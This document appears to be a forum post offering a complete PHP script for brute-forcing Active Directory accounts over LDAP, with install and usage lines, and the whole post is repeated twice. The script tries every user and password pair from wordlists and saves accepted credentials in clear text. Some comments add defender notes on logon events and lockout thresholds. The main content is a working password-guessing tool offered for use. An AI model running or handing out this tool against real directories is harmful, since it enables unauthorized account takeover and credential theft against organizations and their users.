Here is a script to test LDAP (Active Directory) users.
Ldap module install:
Quote:~# apt-get install php5-ldap
Use:
Code:
<?php
/*
* Simple Ldap (Active Directory) brute force
* by n4sss.
*
* Need php5-ldap module in php (:
* ~# apt-get install php5-ldap
* ---snip---
*
*
* php ldap_brute.php user_list.txt pass_list.txt log.txt
*
* $AD_server = "IP_AD";
* $domain = "DOMAIN_AD";
*
*
* twt -> @n4sss
*
* */
// Turns off all PHP error reporting for the rest of the script, so a failed
// fopen(), file_get_contents() or ldap_*() call below shows no warning or notice.
error_reporting(0);
/**
 * Appends one line to a file, terminated with CRLF.
 *
 * The caller in this script passes "user:password" pairs, so the target file
 * ends up holding credentials in clear text; it is created with whatever
 * permissions the process umask gives it.
 *
 * @param string $file    Path of the file to append to (created if missing).
 * @param string $content Text of the line, without a line terminator.
 */
function save_content($file, $content){
    $line = $content . "\r\n";
    // Mode "a": every write lands at the end of the file.
    $handle = fopen($file, "a");
    fwrite($handle, $line);
    fclose($handle);
}
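/**
 * Tries an LDAP simple bind for every user/password pair and appends each
 * pair the server accepts to the log file.
 *
 * Each attempt binds as "<user>@<domain>" on the handle returned by
 * ldap_connect(). Progress and results are printed to standard output.
 *
 * Notes for reviewers and defenders:
 *  - ldap_connect() receives a bare host and this function makes no StartTLS
 *    call, so the bind is presumably sent over plain LDAP. Domain controllers
 *    that require LDAP signing reject simple binds on such connections
 *    (confirm against the server policy in use).
 *  - Every rejected bind is a failed logon on the directory side (presumably
 *    Security event 4625, and 4740 once an account locks out; confirm for the
 *    audit policy in use). A steady stream of failures from one source across
 *    many accounts is the pattern to alert on, and an account lockout
 *    threshold bounds the number of guesses per account.
 *  - Accepted pairs are written to $log in clear text.
 *
 * @param array  $user Candidate account names, one per element; blank entries are skipped.
 * @param array  $pass Candidate passwords, one per element.
 * @param string $log  Path of the file that receives "user:password" lines.
 * @return void
 */
function ad_connect($user, $pass, $log){
    // Placeholders, as documented in the file header. The published listing
    // carried one environment's address and domain here instead.
    $AD_server = "IP_AD";
    $domain = "DOMAIN_AD";
    $ad = ldap_connect($AD_server);
    ldap_set_option($ad, LDAP_OPT_PROTOCOL_VERSION, 3);
    ldap_set_option($ad, LDAP_OPT_REFERRALS, 0);
    foreach($user as $user_id => $user_try){
        foreach($pass as $pass_id => $pass_try){
            sleep(1); // Edit it, if necessary (:
            // empty() skips blank lines of the user list (and the literal "0").
            if(!empty($user_try)){
                $user_try = trim($user_try);
                print "[$user_id] Trying user -> $user_try\n";
                // Simple bind with a userPrincipalName-style identity.
                $bd = ldap_bind($ad, $user_try."@".$domain, $pass_try);
                if( $bd ){
                    print "\n+----------------------+\n";
                    print "[+] $user_try - Password -> $pass_try\n";
                    print "+------------------------+\n\n";
                    // Clear-text credential pair goes to the log file.
                    save_content($log, "$user_try:$pass_try");
                }else{
                    echo "[-] WRONG!\n";
                }
                ldap_unbind($ad);
            }
        }
    }
}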
// Entry point: three command-line arguments are required (user list, password
// list, log file). A missing or falsy argument prints the usage banner and
// exits with status 0.
$missing_args = !$argv[1] || !$argv[2] || !$argv[3];
if ($missing_args) {
    print "==================================\n";
    print "Easy ldap(AD) brute force by n4sss\n";
    print "==================================\n";
    print "USE:\n";
    print "===> php $argv[0] user_list.txt pass_list.txt log.txt\n";
    exit(0);
}

// User list: split on "\n" only; blank entries are kept here and skipped
// later inside ad_connect().
$user_lines = file_get_contents($argv[1]);
$user = explode("\n", $user_lines);

// Password list: split on "\n", then array_filter() drops empty (falsy) lines.
$pass_lines = file_get_contents($argv[2]);
$pass = array_filter(explode("\n", $pass_lines));

// The log path is the third argument with surrounding whitespace removed.
$log = trim($argv[3]);

ad_connect($user, $pass, $log);
?>
Ldap module install:
Quote:~# apt-get install php5-ldap
Use:
Quote:php ldap_brute.php user_list.txt pass_list.txt log.txt
Code:
<?php
/*
* Simple Ldap (Active Directory) brute force
* by n4sss.
*
* Need php5-ldap module in php (:
* ~# apt-get install php5-ldap
* ---snip---
*
*
* php ldap_brute.php user_list.txt pass_list.txt log.txt
*
* $AD_server = "IP_AD";
* $domain = "DOMAIN_AD";
*
*
* twt -> @n4sss
*
* */
// Turns off all PHP error reporting for the rest of the script, so a failed
// fopen(), file_get_contents() or ldap_*() call below shows no warning or notice.
error_reporting(0);
/**
 * Appends one line to a file, terminated with CRLF.
 *
 * The caller in this script passes "user:password" pairs, so the target file
 * ends up holding credentials in clear text; it is created with whatever
 * permissions the process umask gives it.
 *
 * @param string $file    Path of the file to append to (created if missing).
 * @param string $content Text of the line, without a line terminator.
 */
function save_content($file, $content){
    $line = $content . "\r\n";
    // Mode "a": every write lands at the end of the file.
    $handle = fopen($file, "a");
    fwrite($handle, $line);
    fclose($handle);
}
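/**
 * Tries an LDAP simple bind for every user/password pair and appends each
 * pair the server accepts to the log file.
 *
 * Each attempt binds as "<user>@<domain>" on the handle returned by
 * ldap_connect(). Progress and results are printed to standard output.
 *
 * Notes for reviewers and defenders:
 *  - ldap_connect() receives a bare host and this function makes no StartTLS
 *    call, so the bind is presumably sent over plain LDAP. Domain controllers
 *    that require LDAP signing reject simple binds on such connections
 *    (confirm against the server policy in use).
 *  - Every rejected bind is a failed logon on the directory side (presumably
 *    Security event 4625, and 4740 once an account locks out; confirm for the
 *    audit policy in use). A steady stream of failures from one source across
 *    many accounts is the pattern to alert on, and an account lockout
 *    threshold bounds the number of guesses per account.
 *  - Accepted pairs are written to $log in clear text.
 *
 * @param array  $user Candidate account names, one per element; blank entries are skipped.
 * @param array  $pass Candidate passwords, one per element.
 * @param string $log  Path of the file that receives "user:password" lines.
 * @return void
 */
function ad_connect($user, $pass, $log){
    // Placeholders, as documented in the file header. The published listing
    // carried one environment's address and domain here instead.
    $AD_server = "IP_AD";
    $domain = "DOMAIN_AD";
    $ad = ldap_connect($AD_server);
    ldap_set_option($ad, LDAP_OPT_PROTOCOL_VERSION, 3);
    ldap_set_option($ad, LDAP_OPT_REFERRALS, 0);
    foreach($user as $user_id => $user_try){
        foreach($pass as $pass_id => $pass_try){
            sleep(1); // Edit it, if necessary (:
            // empty() skips blank lines of the user list (and the literal "0").
            if(!empty($user_try)){
                $user_try = trim($user_try);
                print "[$user_id] Trying user -> $user_try\n";
                // Simple bind with a userPrincipalName-style identity.
                $bd = ldap_bind($ad, $user_try."@".$domain, $pass_try);
                if( $bd ){
                    print "\n+----------------------+\n";
                    print "[+] $user_try - Password -> $pass_try\n";
                    print "+------------------------+\n\n";
                    // Clear-text credential pair goes to the log file.
                    save_content($log, "$user_try:$pass_try");
                }else{
                    echo "[-] WRONG!\n";
                }
                ldap_unbind($ad);
            }
        }
    }
}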
// Entry point: three command-line arguments are required (user list, password
// list, log file). A missing or falsy argument prints the usage banner and
// exits with status 0.
$missing_args = !$argv[1] || !$argv[2] || !$argv[3];
if ($missing_args) {
    print "==================================\n";
    print "Easy ldap(AD) brute force by n4sss\n";
    print "==================================\n";
    print "USE:\n";
    print "===> php $argv[0] user_list.txt pass_list.txt log.txt\n";
    exit(0);
}

// User list: split on "\n" only; blank entries are kept here and skipped
// later inside ad_connect().
$user_lines = file_get_contents($argv[1]);
$user = explode("\n", $user_lines);

// Password list: split on "\n", then array_filter() drops empty (falsy) lines.
$pass_lines = file_get_contents($argv[2]);
$pass = array_filter(explode("\n", $pass_lines));

// The log path is the third argument with surrounding whitespace removed.
$log = trim($argv[3]);

ad_connect($user, $pass, $log);
?>